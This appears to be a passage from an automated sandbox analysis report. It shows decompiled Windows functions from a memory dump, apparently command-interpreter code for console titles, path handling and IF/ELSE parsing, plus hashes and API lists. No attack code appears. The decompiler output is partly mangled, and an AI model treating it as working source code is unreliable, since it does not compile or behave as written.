			E4A73DEBE(WCHAR** _a4) {
				signed int _v8;
				char _v72;
				WCHAR* _v76;
				long _v80;
				LPWSTR* _v84;
				signed int _v88;
				LPWSTR* _v92;
				long _v96;
				LPWSTR* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t86;
				LPWSTR* _t88;
				signed int _t89;
				intOrPtr _t92;
				WCHAR** _t93;
				signed char _t95;
				wchar_t* _t96;
				wchar_t* _t98;
				long _t101;
				intOrPtr _t109;
				WCHAR** _t112;
				intOrPtr _t116;
				WCHAR* _t117;
				WCHAR* _t118;
				WCHAR* _t119;
				WCHAR* _t122;
				long _t123;
				short* _t124;
				LPWSTR* _t126;
				WCHAR** _t129;
				WCHAR** _t139;
				void* _t141;
				intOrPtr _t142;
				WCHAR** _t143;
				WCHAR* _t146;
				signed int _t148;
				signed int _t151;
				long _t153;
				WCHAR** _t155;
				signed int _t160;
				void* _t161;
				void* _t164;
				intOrPtr _t171;

				_t86 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t86 ^ _t160;
				_t158 = _a4;
				_t148 = 1;
				_v88 = 0;
				_v84 = 0;
				 *0x4a7540cc = 0;
				_v100 = 1;
				_t88 = E4A731896(0x24);
				_v92 = _t88;
				if(_t88 == 0) {
					L24:
					_t89 = _t148;
					L18:
					return E4A7313A9(_t89, 0, _v8 ^ _t160, _t144, _t148, _t158);
				}
				_t139 =  *0x4a7540bc; // 0x0
				if(_t139 == 0) {
					 *0x4a7540bc = E4A731896(4);
					_t92 = E4A731896(4);
					L5:
					 *0x4a7540c0 = _t92;
					_t93 =  *0x4a7540bc; // 0x0
					if(_t93 == 0) {
						goto L24;
					}
					_t171 =  *0x4a7540c0; // 0x0
					if(_t171 == 0) {
						goto L24;
					}
					_t141 = _v88 + _v88;
					 *((short*)(_t141 + _t93)) = _t158[0x11];
					_t144 =  *0x4a7540bc; // 0x0
					 *((short*)(_t141 +  &(_t144[0]))) = 0;
					_t95 = _t158[0x12];
					if((_t95 & 0x00000001) != 0) {
						_t96 = E4A7322CA(_t158[0xf], 0, 0);
						_v76 = _t96;
						_v80 = wcstol(_t96, 0, 0);
						_t98 = E4A73413B(_v76);
						_v76 = _t98;
						_v96 = wcstol(_t98, 0, 0);
						_t101 = wcstol(E4A73413B(_v76), 0, 0);
						_t164 = _t161 + 0x24;
						_v76 = _t101;
						_v92 = 0;
						while(1) {
							__eflags = _v96;
							if(_v96 < 0) {
								goto L30;
							}
							_t102 = _v76;
							__eflags = _v80 - _v76;
							if(_v80 > _v76) {
								L11:
								_t148 = _v88;
								if(_t148 == 0) {
									 *0x4a7540bc = 0;
									 *0x4a7540c0 = 0;
									L17:
									_t89 = _v84;
									goto L18;
								}
								_t143 =  *0x4a7540bc; // 0x0
								if(_t143 == 0) {
									__eflags =  *_t143;
									if( *_t143 != 0) {
										goto L13;
									}
									L16:
									_t116 =  *0x4a7540c0; // 0x0
									 *((intOrPtr*)(_t116 + _t148 * 4)) = 0;
									goto L17;
								}
								L13:
								_t112 = _t143;
								_t26 =  &(_t112[0]); // 0x2
								_t158 = _t26;
								do {
									_t146 =  *_t112;
									_t112 =  &(_t112[0]);
								} while (_t146 != 0);
								_t144 = 0;
								 *((short*)(_t143 + (_t112 - _t158 >> 1) * 2 - 2)) = 0;
								goto L16;
							}
							L27:
							E4A734B2A(E4A73DFFF(_t102));
							E4A73179D( &_v72, 0x20, E4A735104, _v80);
							_t142 =  *0x4a7540c0; // 0x0
							_t164 = _t164 + 0x10;
							_t151 = _v88 << 2;
							 *((intOrPtr*)(_t151 + _t142)) =  &_v72;
							_v84 = E4A73DBCE(0, _t144, _t151, _t158[0x10], _v100);
							_t109 =  *0x4a7540c0; // 0x0
							 *((intOrPtr*)(_t151 + _t109)) = 0;
							_v92 = E4A73DC07(_v92);
							_v80 = _v80 + _v96;
							_v100 = 0;
							continue;
							L30:
							_t102 = _v80;
							__eflags = _v80 - _v76;
							if(_v80 >= _v76) {
								goto L27;
							}
							goto L11;
						}
					}
					_t173 = _t95 & 0x00000008;
					if((_t95 & 0x00000008) == 0) {
						__eflags = _t95 & 0x00000004;
						if((_t95 & 0x00000004) != 0) {
							_t117 = _t158[0x13];
							__eflags = _t117;
							if(_t117 == 0) {
								_t117 = 0x4a744cac;
							}
							_t118 = E4A732598(_t141, _t117);
							_v80 = _t118;
							_t119 = GetFullPathNameW(_t118, 0, 0, 0);
							_v96 = _t119;
							__eflags = _t119;
							if(_t119 == 0) {
								L42:
								_t158 = 1;
								E4A736D44(_t141, 0x400023d9, 1, _v80);
								_v84 = 1;
							} else {
								_t122 = E4A731896(_t119 +  &(_t119[1]));
								_v76 = _t122;
								__eflags = _t122;
								if(_t122 != 0) {
									_t123 = GetFullPathNameW(_v80, _v96, _t122, 0);
									__eflags = _t123;
									if(_t123 == 0) {
										goto L42;
									}
									_t153 = _v96;
									__eflags = _t123 - _t153;
									if(_t123 >= _t153) {
										goto L42;
									}
									_t124 = E4A732ED1(_v76);
									__eflags =  *_t124 - 0x5c;
									if( *_t124 != 0x5c) {
										__eflags = _t153 + 1;
										E4A7320A9(_t158, _v76, _t153 + 1, E4A732EC8);
									}
									_t126 = E4A74BF0C(_v76, _t158, _v92, _v88, E4A7322CA(_t158[0xf], 0, 0));
									L10:
									_v84 = _t126;
									goto L11;
								}
								_v84 = 1;
							}
							goto L11;
						}
						_t126 = E4A73E342(_t158, _v92, _v88, E4A7322CA(_t158[0xf], 0, 0), _t148);
						goto L10;
					}
					_t126 = E4A73E46C(_t173, _t158, _v88, _t148);
					goto L10;
				}
				_t129 = _t139;
				_t7 =  &(_t129[0]); // 0x2
				_t155 = _t7;
				do {
					_t144 =  *_t129;
					_t129 =  &(_t129[0]);
				} while (_t144 != 0);
				_t9 = (_t129 - _t155 >> 1) + 4; // 0x6
				_v88 = _t129 - _t155 >> 1;
				 *0x4a7540bc = E4A732536(_t139, (_t129 - _t155 >> 1) + _t9);
				_t92 = E4A732536( *0x4a7540c0, 4 + (_t129 - _t155 >> 1) * 4);
				_t148 = 1;
				goto L5;
			}

0x4a73dec6
0x4a73decd
0x4a73ded2
0x4a73deda
0x4a73dedd
0x4a73dee0
0x4a73dee3
0x4a73dee9
0x4a73deec
0x4a73def1
0x4a73def6
0x4a73f44f
0x4a73f44f
0x4a73dfde
0x4a73dfec
0x4a73dfec
0x4a73defc
0x4a73df04
0x4a73fdd5
0x4a73fdda
0x4a73df48
0x4a73df48
0x4a73df4d
0x4a73df54
0x00000000
0x00000000
0x4a73df5a
0x4a73df60
0x00000000
0x00000000
0x4a73df6d
0x4a73df6f
0x4a73df73
0x4a73df7b
0x4a73df80
0x4a73df85
0x4a73f937
0x4a73f945
0x4a73f950
0x4a73f953
0x4a73f95b
0x4a73f966
0x4a73f971
0x4a73f973
0x4a73f976
0x4a73f979
0x4a73f8bf
0x4a73f8bf
0x4a73f8c2
0x00000000
0x00000000
0x4a73f8c8
0x4a73f8cb
0x4a73f8ce
0x4a73dfa0
0x4a73dfa0
0x4a73dfa5
0x4a73f430
0x4a73f436
0x4a73dfdb
0x4a73dfdb
0x00000000
0x4a73dfdb
0x4a73dfab
0x4a73dfb3
0x4a73f441
0x4a73f444
0x00000000
0x00000000
0x4a73dfd3
0x4a73dfd3
0x4a73dfd8
0x00000000
0x4a73dfd8
0x4a73dfb9
0x4a73dfb9
0x4a73dfbb
0x4a73dfbb
0x4a73dfbe
0x4a73dfbe
0x4a73dfc2
0x4a73dfc3
0x4a73dfcc
0x4a73dfce
0x00000000
0x4a73dfce
0x4a73f8d4
0x4a73f8d9
0x4a73f8ec
0x4a73f8f4
0x4a73f8fa
0x4a73f903
0x4a73f906
0x4a73f914
0x4a73f917
0x4a73f91c
0x4a73f924
0x4a73f92a
0x4a73f92d
0x00000000
0x4a744be8
0x4a744be8
0x4a744beb
0x4a744bee
0x00000000
0x00000000
0x00000000
0x4a744bf4
0x4a73f8bf
0x4a73df8b
0x4a73df8d
0x4a73e442
0x4a73e444
0x4a744bf9
0x4a744bfc
0x4a744bfe
0x4a744c00
0x4a744c00
0x4a744c06
0x4a744c15
0x4a744c18
0x4a744c1a
0x4a744c1d
0x4a744c1f
0x4a744c8f
0x4a744c94
0x4a744c9b
0x4a744ca3
0x4a744c21
0x4a744c26
0x4a744c2b
0x4a744c2e
0x4a744c30
0x4a744c46
0x4a744c48
0x4a744c4a
0x00000000
0x00000000
0x4a744c4c
0x4a744c4f
0x4a744c51
0x00000000
0x00000000
0x4a744c56
0x4a744c5b
0x4a744c5f
0x4a744c66
0x4a744c6b
0x4a744c6b
0x4a744c85
0x4a73df9d
0x4a73df9d
0x00000000
0x4a73df9d
0x4a744c32
0x4a744c32
0x00000000
0x4a744c1f
0x4a73e45d
0x00000000
0x4a73e45d
0x4a73df98
0x00000000
0x4a73df98
0x4a73df0a
0x4a73df0c
0x4a73df0c
0x4a73df0f
0x4a73df0f
0x4a73df13
0x4a73df14
0x4a73df1f
0x4a73df25
0x4a73df2d
0x4a73df40
0x4a73df47
0x00000000

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: a9d6f05eea3824622b05fe84daa31674100f988e946d4ead7e31e15744d3ae3d
Instruction ID: 18367b0ddbc910e596ab1725227f54b92bbff755e53f63492bbed25e3de843e3
Opcode Fuzzy Hash: a9d6f05eea3824622b05fe84daa31674100f988e946d4ead7e31e15744d3ae3d
Instruction Fuzzy Hash: 6A918EB1908619EFCB309FE4CC84AAEBBBAFF44354F164429E105EB616D7319D4ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A73216E, Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E4A73216E(void* __ebx, void* __edi, signed short __esi, void* __eflags) {
				void* _t39;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t64;
				void* _t67;

				_t66 = __esi;
				_t65 = __edi;
				_push(0x430);
				_push(0x4a732280);
				E4A7313E1(__ebx, __edi, __esi);
				_t58 =  *((intOrPtr*)(_t67 + 8));
				GetConsoleTitleW(_t67 - 0x430, 0x104);
				_t3 = _t58 + 0x38; // 0x0
				_t34 =  *_t3;
				if( *_t3 == 0) {
					L36:
					goto L7;
				} else {
					__eflags =  *((short*)(__eax + 2)) - 0x3a;
					if( *((short*)(__eax + 2)) == 0x3a) {
						goto L1;
					}
					__eax = __ebp - 0x434;
					__edi = E4A7341DD(__ebx, __ebp - 0x434);
					 *(__ebp - 0x43c) = __edi;
					__eflags = __edi - 0xffffffff;
					if(__edi == 0xffffffff) {
						L6:
						E4A733D05(_t58);
						L7:
						return E4A7313CA(_t58, _t65, _t66);
					}
					__eax = E4A734165(__edi);
					 *(__ebp - 0x438) = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						L35:
						goto L7;
					}
					__ax =  *0x4a77065c; // 0x2f
					 *(__ebp - 0x224) = __ax;
					__eax = 0;
					 *((short*)(__ebp - 0x222)) = __ax;
					__eax = __ebp - 0x224;
					_t15 = __ebx + 0x3c; // 0x0
					__esi = E4A7322CA( *_t15, __ebp - 0x224, 2);
					__eflags = __edi - 0xa;
					if(__edi == 0xa) {
						__eflags = __esi;
						if(__esi == 0) {
							goto L12;
						}
						__eax = wcsncmp(__esi, E4A735B40, 4);
						__eflags = __eax;
						if(__eax != 0) {
							while(1) {
								L14:
								__eflags = __esi;
								if(__esi == 0) {
									break;
								}
								__eflags =  *__esi;
								if( *__esi == 0) {
									break;
								}
								__eax = __esi;
								_t16 = __eax + 2; // 0x2
								__edx = _t16;
								do {
									__cx =  *__eax;
									__eax = __eax + 1;
									__eax = __eax + 1;
									__eflags = __cx;
								} while (__cx != 0);
								__eax = __eax - __edx;
								__edi = __eax;
								__eax = E4A732598(__ecx, __esi);
								__edi = __edi + 1;
								__eax = E4A73185A(__esi, __edi, __eax);
								__eflags =  *(__ebp - 0x434) & 0x00000001;
								if(( *(__ebp - 0x434) & 0x00000001) != 0) {
									__eflags = __esi[0] - 0x3a;
									if(__esi[0] != 0x3a) {
										goto L19;
									}
									__eax =  *__esi & 0x0000ffff;
									__eax = E4A732B68( *__esi & 0x0000ffff);
									__eflags = __eax;
									if(__eax == 0) {
										_push(0);
										_push(0xf);
										L41:
										__eax = E4A736D44(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										0 = 1;
										 *0x4a754188 = 1;
										goto L7;
									}
									__eflags =  *(__ebp - 0x43c) - 4;
									if( *(__ebp - 0x43c) == 4) {
										goto L19;
									}
									__eax =  *__esi & 0x0000ffff;
									__eax = E4A73395E( *__esi & 0x0000ffff);
									__eflags = __eax;
									if(__eax == 0) {
										goto L19;
									}
									_push(0);
									_push(GetLastError());
									goto L41;
								}
								L19:
								__eflags =  *(__ebp - 0x434) & 0x00000002;
								if(( *(__ebp - 0x434) & 0x00000002) != 0) {
									__eflags =  *__esi -  *0x4a77065c; // 0x2f
									if(__eflags != 0) {
										goto L20;
									}
									_push(0);
									_push(0x232a);
									goto L41;
								}
								L20:
								__esi = E4A73413B(__esi);
							}
							__eax = E4A73246C(__ebx);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E4A7324ED(__eax, __ecx, __eax);
							}
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							 *((intOrPtr*)(__ebp - 0x440)) =  *(__ebp - 0x438)(__ebx);
							 *(__ebp - 4) = 0xfffffffe;
							E4A7343A7() =  *((intOrPtr*)(__ebp - 0x440));
							goto L7;
						}
					}
					L12:
					__eflags = __edi - 0x1f;
					if(__edi == 0x1f) {
						goto L14;
					}
					__eax = E4A73446E(__edi, __esi);
					__eflags = __al;
					if(__al != 0) {
						goto L36;
					}
					goto L14;
				}
				L1:
				_t39 = E4A732B68( *_t34 & 0x0000ffff);
				if(_t39 == 0) {
					_push(_t39);
					_push(0xf);
					L38:
					E4A736D44(_t59);
					goto L36;
				}
				_t4 = _t58 + 0x38; // 0x0
				if(E4A73395E( *( *_t4) & 0x0000ffff) != 0) {
					_push(0);
					_push(GetLastError());
					goto L38;
				}
				_t5 = _t58 + 0x38; // 0x0
				_t66 = towupper( *( *_t5) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
				_t6 = _t58 + 0x38; // 0x0
				_t49 =  *_t6;
				_t7 = _t49 + 2; // 0x2
				_t64 = _t7;
				do {
					_t63 =  *_t49;
					_t49 = _t49 + 2;
				} while (_t63 != 0);
				if(_t49 - _t64 >> 1 == 2) {
					E4A7400DD(_t64, _t66 & 0x0000ffff);
					goto L35;
				}
				goto L6;
			}

0x4a73216e
0x4a73216e
0x4a73216e
0x4a732173
0x4a732178
0x4a73217d
0x4a73218c
0x4a732192
0x4a732192
0x4a732197
0x4a740f69
0x00000000
0x4a73219d
0x4a73219d
0x4a7321a2
0x00000000
0x00000000
0x4a7321a8
0x4a7321b5
0x4a7321b7
0x4a7321bd
0x4a7321c0
0x4a7315bf
0x4a7315c0
0x4a7315c5
0x4a7315ca
0x4a7315ca
0x4a7321c7
0x4a7321cc
0x4a7321d2
0x4a7321d4
0x4a740f62
0x00000000
0x4a740f62
0x4a7321da
0x4a7321e0
0x4a7321e7
0x4a7321e9
0x4a7321f2
0x4a7321f9
0x4a732201
0x4a732203
0x4a732206
0x4a735b1a
0x4a735b1c
0x00000000
0x00000000
0x4a735b2a
0x4a735b33
0x4a735b35
0x4a732220
0x4a732220
0x4a732220
0x4a732222
0x00000000
0x00000000
0x4a732228
0x4a73222c
0x00000000
0x00000000
0x4a732232
0x4a732234
0x4a732234
0x4a732237
0x4a732237
0x4a73223a
0x4a73223b
0x4a73223c
0x4a73223c
0x4a732241
0x4a732245
0x4a732248
0x4a73224e
0x4a732251
0x4a732256
0x4a73225d
0x4a739966
0x4a73996b
0x00000000
0x00000000
0x4a739971
0x4a739975
0x4a73997a
0x4a73997c
0x4a7471f3
0x4a7471f5
0x4a7471f7
0x4a7471f7
0x4a7471fc
0x4a7471fd
0x4a747200
0x4a747201
0x00000000
0x4a747201
0x4a739982
0x4a739989
0x00000000
0x00000000
0x4a73998f
0x4a739993
0x4a739998
0x4a73999a
0x00000000
0x00000000
0x4a74720b
0x4a747213
0x00000000
0x4a747213
0x4a732263
0x4a732263
0x4a73226a
0x4a735658
0x4a73565f
0x00000000
0x00000000
0x4a747216
0x4a747218
0x00000000
0x4a747218
0x4a732270
0x4a732276
0x4a732276
0x4a73436b
0x4a734370
0x4a734372
0x4a734375
0x4a734375
0x4a73437a
0x4a734385
0x4a73438b
0x4a734397
0x00000000
0x4a734397
0x4a735b3b
0x4a73220c
0x4a73220c
0x4a73220f
0x00000000
0x00000000
0x4a732213
0x4a732218
0x4a73221a
0x00000000
0x00000000
0x00000000
0x4a73221a
0x4a731568
0x4a73156c
0x4a731573
0x4a7471d9
0x4a7471da
0x4a7471dc
0x4a7471dc
0x00000000
0x4a7471e2
0x4a731579
0x4a731587
0x4a7471e8
0x4a7471f0
0x00000000
0x4a7471f0
0x4a73158d
0x4a73159f
0x4a7315a2
0x4a7315a2
0x4a7315a5
0x4a7315a5
0x4a7315a8
0x4a7315a8
0x4a7315ac
0x4a7315ad
0x4a7315b9
0x4a740f5d
0x00000000
0x4a740f5d
0x00000000

APIs

towupper.MSVCRT ref: 4A731594

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

GetConsoleTitleW.KERNEL32 ref: 4A73218C
wcsncmp.MSVCRT(00000000,4A735B40,00000004,00000000,?,00000002,00000000,4A754210,?,?,4A73745B,-00000003,00000000,00000000,00000000,00000000), ref: 4A735B2A

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleTitleiswspacetowupperwcsncmp
String ID:
API String ID: 4235436829-0
Opcode ID: 937eacfaf029b3aa0a0d4fb5ec810d482d971c4cb7c354d63376328bed3745e6
Instruction ID: eccd163e1be641bb574ffa6a00533c659a164f9c1c0a5c3298b7c74fab19f176
Opcode Fuzzy Hash: 937eacfaf029b3aa0a0d4fb5ec810d482d971c4cb7c354d63376328bed3745e6
Instruction Fuzzy Hash: C551E9B151DA12A9DBB05FA0CC48BAA3BACDF45751F034455EA42DF083E734CA8DC768

Uniqueness

Uniqueness Score: -1.00%

Function 4A73C2F7, Relevance: 7.7, APIs: 5, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E4A73C2F7(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v528;
				WCHAR* _v532;
				wchar_t* _v536;
				signed int _v540;
				signed int _v544;
				wchar_t* _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr* _t51;
				intOrPtr* _t55;
				signed int _t58;
				WCHAR* _t59;
				wchar_t* _t64;
				wchar_t* _t67;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;

				_t72 = __ecx;
				_t41 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t41 ^ _t83;
				_t80 = _a4;
				_t81 = 0;
				_v548 = 0;
				_v536 = 0;
				if(E4A73C44E(__ecx,  &_v552) != 0 || _v552 == 0) {
					if(_t80 == _t81) {
						_v532 = _t81;
						goto L10;
					}
					_t27 = _t80 + 0x3c; // 0x0
					_t51 = E4A732B0D( *_t27, _t81);
					_v532 = _t51;
					if(_t51 == _t81) {
						goto L12;
					}
					_t29 = _t51 + 2; // 0x2
					_t79 = _t29;
					do {
						_t72 =  *_t51;
						_t51 = _t51 + 2;
					} while (_t72 != _t81);
					if(_t51 - _t79 >> 1 < 0x104) {
						goto L10;
					}
					_v540 = 1;
					goto L35;
				} else {
					_t70 = 1;
					_v540 = 1;
					_t55 = E4A73C56B(__ecx);
					_t72 = 0x40002748;
					_v536 = _t55;
					if(_t55 == 0) {
						L35:
						_push(_t81);
						_push(8);
						E4A736D44(_t72);
						L18:
						return E4A7313A9(_v540, _t70, _v8 ^ _t83, _t79, _t80, _t81);
					}
					_t9 = _t55 + 2; // 0x2
					_t79 = _t9;
					do {
						_t72 =  *_t55;
						_t55 = _t55 + 2;
					} while (_t72 != 0);
					_t58 = _t55 - _t79 >> 1;
					_v544 = _t58;
					if(_t58 >= 0x104) {
						L15:
						_t81 = 0;
						if(_v536 != 0) {
							LocalFree(_v536);
						}
						if(_v540 != _t81) {
							goto L35;
						} else {
							goto L18;
						}
					}
					_t59 = E4A731896(0x208);
					_v532 = _t59;
					if(_t59 == 0) {
						goto L15;
					}
					_v548 = 1;
					E4A73185A(_t59, 0x104, _v536);
					if(_t80 == 0) {
						_t70 =  &_v528;
						if(GetConsoleTitleW(_t70, 0x104) == 0) {
							L13:
							if(_v532 != 0) {
								E4A73142E(_v532);
							}
							goto L15;
						}
						_t80 = wcsstr;
						_t64 = wcsstr(_t70, _v536);
						_pop(_t72);
						if(_t64 != 0) {
							_v544 = _v544 + _v544;
							while(1) {
								_t70 = _t70 + _v544;
								_t67 = wcsstr(_t70, _v536);
								_pop(_t72);
								if(_t67 == 0) {
									goto L27;
								}
							}
						}
						L27:
						if(E4A7320A9(0x104, _v532, 0x104, _t70) == 0) {
							L10:
							_t81 = 0;
							if(_v532 != 0) {
								SetConsoleTitleW(_v532);
								 *0x4a754083 = 0;
							}
							L12:
							_v540 = _t81;
							if(_v548 == _t81) {
								goto L15;
							}
							goto L13;
						}
						goto L13;
					}
					_t14 = _t80 + 0x3c; // 0x0
					_t80 =  *_t14;
					if(_t80 == 0) {
						_v540 = _v540 & _t80;
						goto L13;
					}
					if(E4A7320A9(0x104, _v532, 0x104, _t80) != 0) {
						goto L13;
					}
					goto L10;
				}
			}

0x4a73c2f7
0x4a73c302
0x4a73c309
0x4a73c30f
0x4a73c318
0x4a73c31b
0x4a73c321
0x4a73c32e
0x4a740618
0x4a743420
0x00000000
0x4a743420
0x4a74061f
0x4a740622
0x4a740627
0x4a74062f
0x00000000
0x00000000
0x4a740635
0x4a740635
0x4a740638
0x4a740638
0x4a74063c
0x4a74063d
0x4a74064b
0x00000000
0x00000000
0x4a745d92
0x00000000
0x4a73c340
0x4a73c342
0x4a73c348
0x4a73c34e
0x4a73c353
0x4a73c354
0x4a73c35c
0x4a745d9c
0x4a745d9c
0x4a745d9d
0x4a745d9f
0x4a73c432
0x4a73c446
0x4a73c446
0x4a73c362
0x4a73c362
0x4a73c365
0x4a73c365
0x4a73c369
0x4a73c36a
0x4a73c371
0x4a73c378
0x4a73c380
0x4a73c410
0x4a73c410
0x4a73c418
0x4a73c420
0x4a73c420
0x4a73c42c
0x00000000
0x00000000
0x00000000
0x00000000
0x4a73c42c
0x4a73c38b
0x4a73c390
0x4a73c398
0x00000000
0x00000000
0x4a73c3a0
0x4a73c3a8
0x4a73c3af
0x4a7433d3
0x4a7433e5
0x4a73c3fc
0x4a73c403
0x4a73c40b
0x4a73c40b
0x00000000
0x4a73c403
0x4a7433f1
0x4a7433fa
0x4a7433fd
0x4a743400
0x4a745d66
0x4a745d6c
0x4a745d6c
0x4a745d79
0x4a745d7c
0x4a745d7f
0x00000000
0x00000000
0x4a745d85
0x4a745d6c
0x4a743406
0x4a743415
0x4a73c3d1
0x4a73c3d1
0x4a73c3d9
0x4a73c3e1
0x4a73c3e7
0x4a73c3e7
0x4a73c3ee
0x4a73c3ee
0x4a73c3fa
0x00000000
0x00000000
0x00000000
0x4a73c3fa
0x00000000
0x4a74341b
0x4a73c3b5
0x4a73c3b5
0x4a73c3ba
0x4a745d87
0x00000000
0x4a745d87
0x4a73c3cf
0x00000000
0x00000000
0x00000000
0x4a73c3cf

APIs

Part of subcall function 4A73C56B: FormatMessageW.KERNEL32(00001900,00000000,74EC5129,00000000,00000000,00000000,74EC5129,?,?,?,4A73C353,40002748,?,-00000003,74EC5129,00000000), ref: 4A73C590

SetConsoleTitleW.KERNEL32(?), ref: 4A73C3E1
LocalFree.KERNEL32(?,00000000,00000000,?,-00000003,74EC5129,00000000), ref: 4A73C420

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleFormatFreeLocalMessageTitle
String ID:
API String ID: 3649520976-0
Opcode ID: b957246106e7d4abe8aaf5b60eb549f75f63f8166e70b7871edf69636f90e3ba
Instruction ID: 57abdbf41685aa6f2ec3fc5de3fd1840bc801d1bf9899c3b2253262ef7f4a196
Opcode Fuzzy Hash: b957246106e7d4abe8aaf5b60eb549f75f63f8166e70b7871edf69636f90e3ba
Instruction Fuzzy Hash: 4751D07198962DABDB719B24CC8C6DEBFB8EF14750F1204E5D008A6152DB708E9CCF91

Uniqueness

Uniqueness Score: -1.00%

Function 4A736098, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E4A736098(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
				signed int _v0;
				signed int __ebx;
				void* __ebp;
				intOrPtr _t16;
				intOrPtr _t20;
				void* _t23;
				void* _t27;
				void* _t29;

				_t25 = __ecx;
				asm("das");
				 *_t25 =  *__ecx + __ecx;
				 *__eax =  *__eax + __eax;
				_pop(__edi);
				_pop(__esi);
				__ebp = __esp;
				__edi = 0x4a768640;
				__ebx = 0;
				__imp___wcsicmp(L"IF/?", __edi, __esi, __ebx, __ecx, __ebp);
				_pop(__ecx);
				__ecx = 0x4a768640;
				__eflags = __eax;
				if(__eax == 0) {
					__eax = 0x4a754610;
					_t10 = __eax + 2; // 0x4a754612
					__edx = _t10;
					do {
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
						__eflags = __cx;
					} while (__cx != 0);
					__eax = __eax - __edx;
					__eax = __eax >> 1;
					__ecx = 0;
					__ebx = 0;
					 *((short*)(0x4a768640 + __eax * 2)) = __cx;
					__ebx = 1;
					goto L4;
				} else {
					L4:
					__esi = E4A7329E9(__ecx, 0x2c);
					__eflags = __ebx;
					if(__eflags != 0) {
						__eax = 0x2f;
						 *0x4a768640 = __ax;
						__eax = 0x3f;
						 *0x4a768642 = __ax;
						__eax = 0;
						 *0x4a768644 = __ax;
					} else {
						__eax = E4A731CBF(0);
					}
					__eax = E4A735228(__ebx, __edx, __edi, __esi, __eflags, __edi, 0x2c);
					__eflags = __al;
					if(__al != 0) {
						 *(__esi + 0x38) =  *(__esi + 0x38) & 0x00000000;
						 *__esi = 0x3c;
						goto L16;
					} else {
						__ebx = 0;
						_v0 = 0;
						__eflags =  *0x4a754081 - __bl; // 0x0
						if(__eflags == 0) {
							L9:
							__eax = E4A731D26(__eax, __ebx, __ebx, __ebx);
							L10:
							__eax = E4A73617F(__ecx, __ebx);
							 *(__esi + 0x3c) = __eax;
							__eflags = __eax - __ebx;
							if(__eax != __ebx) {
								__eflags = _v0 - __ebx;
								if(_v0 != __ebx) {
									__eflags =  *__eax - 0x38;
									if( *__eax == 0x38) {
										__eax =  *(__eax + 0x3c);
									}
									 *((intOrPtr*)(__eax + 0x40)) = 2;
								}
							}
							__eax = E4A731C59(__ebx, 0x2c);
							 *(__esi + 0x40) = __eax;
							__eflags = __eax - __ebx;
							if(__eax == __ebx) {
								__eax = E4A74EE72();
							}
							__eax = E4A7329D5();
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E4A731CBF(__ebx);
								__imp___wcsicmp(L"ELSE");
								_pop(__ecx);
								__ecx = __edi;
								__eflags = __eax;
								if(__eax == 0) {
									_t16 =  *0x4a754178; // 0x0
									 *((intOrPtr*)(_t29 + 0x44)) = E4A732041(_t16 + _t16);
									E4A73185A(_t18,  *0x4a754178, _t27);
									_t20 = E4A731C59(_t23, 0x2c);
									 *((intOrPtr*)(_t29 + 0x48)) = _t20;
									if(_t20 == _t23) {
										E4A74EE72();
									}
								} else {
									__eax = E4A731D26(__eax, __ebx, __ebx, __ebx);
								}
							}
							L16:
							return _t29;
						}
						__imp___wcsicmp(E4A736098);
						__ecx = __edi;
						_pop(__ecx);
						__eflags = __eax;
						if(__eax == 0) {
							_v0 = 1;
							goto L10;
						}
						goto L9;
					}
				}
			}

0x4a736098
0x4a736098
0x4a736099
0x4a73609c
0x4a73609e
0x4a73609f
0x4a7360a8
0x4a7360ae
0x4a7360b9
0x4a7360bb
0x4a7360c1
0x4a7360c2
0x4a7360c3
0x4a7360c5
0x4a747f7c
0x4a747f81
0x4a747f81
0x4a747f84
0x4a747f84
0x4a747f87
0x4a747f88
0x4a747f89
0x4a747f89
0x4a747f8e
0x4a747f90
0x4a747f92
0x4a747f94
0x4a747f96
0x4a747f9e
0x00000000
0x4a7360cb
0x4a7360cb
0x4a7360d2
0x4a7360d4
0x4a7360d6
0x4a747fa6
0x4a747fa7
0x4a747faf
0x4a747fb0
0x4a747fb6
0x4a747fb8
0x4a7360dc
0x4a7360de
0x4a7360de
0x4a7360e6
0x4a7360eb
0x4a7360ed
0x4a747fc3
0x4a747fc7
0x00000000
0x4a7360f3
0x4a7360f3
0x4a7360f5
0x4a7360f8
0x4a7360fe
0x4a736116
0x4a736119
0x4a73611e
0x4a73611f
0x4a736124
0x4a736127
0x4a736129
0x4a73612b
0x4a73612e
0x4a73db74
0x4a73db77
0x4a73fdf1
0x4a73fdf1
0x4a73db7d
0x4a73db7d
0x4a73612e
0x4a736136
0x4a73613b
0x4a73613e
0x4a736140
0x4a747fd2
0x4a747fd2
0x4a736146
